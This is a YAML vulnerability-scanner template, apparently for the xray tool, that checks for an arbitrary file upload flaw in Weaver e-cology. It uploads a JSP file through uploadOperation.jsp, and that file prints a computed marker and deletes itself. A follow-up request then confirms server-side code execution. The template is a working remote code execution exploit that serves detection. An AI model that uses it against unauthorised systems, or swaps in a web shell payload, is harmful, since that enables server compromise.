ecology-arbitrary-file-upload.yml

name: poc-yaml-ecology-arbitrary-file-upload
manual: true
transport: http
set:
    r1: randomLowercase(4)
    r2: randomInt(40000, 44800)
    r3: randomInt(40000, 44800)
rules:
    r0:
        request:
            cache: true
            method: POST
            path: /page/exportImport/uploadOperation.jsp
            headers:
                Content-Type: multipart/form-data; boundary=b0d829daa06c13d6b3e16b0ad21d1eed
            body: "\
                --b0d829daa06c13d6b3e16b0ad21d1eed\r\n\
                Content-Disposition: form-data; name=\"file\"; filename=\"{{r1}}.jsp\"\r\n\
                Content-Type: application/octet-stream\r\n\
                \r\n\
                <%out.print({{r2}} * {{r3}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\r\n\
                --b0d829daa06c13d6b3e16b0ad21d1eed--\r\n\
                "
        expression: response.status == 200
    r1:
        request:
            cache: true
            method: GET
            path: /page/exportImport/fileTransfer/{{r1}}.jsp
        expression: response.status == 200 && response.body.bcontains(bytes(string(r2 * r3)))
expression: r0() && r1()
detail:
    author: jingling(https://github.com/shmilylty)
    links:
        - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g